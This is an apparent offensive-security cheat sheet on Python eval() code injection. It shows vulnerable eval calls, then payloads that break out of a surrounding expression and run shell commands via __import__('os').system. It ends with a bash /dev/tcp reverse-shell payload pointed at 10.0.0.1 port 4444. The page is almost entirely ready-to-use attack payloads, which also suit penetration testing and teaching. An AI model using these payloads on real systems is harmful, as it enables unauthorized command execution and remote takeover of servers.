Python Eval Code Execution
Last modified: 2023-04-11
Python's eval() method is vulnerable to arbitrary code execution.
Investigation
eval(text)
eval(f"5 + {num}")
If the Python script allows us to input some value to the "text" variable, we can inject arbitrary code.
Arbitrary Code Execution
Most of the time, we need to bypass another expression to execute our desired command.
__import__('os').system('id')
<!-- Bypass another expression in eval -->
),__import__('os').system('id')
'),__import__('os').system('id')
},__import__('os').system('id')
),__import__('os').system('id')#
Reverse Shell
__import__('os').system('bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"')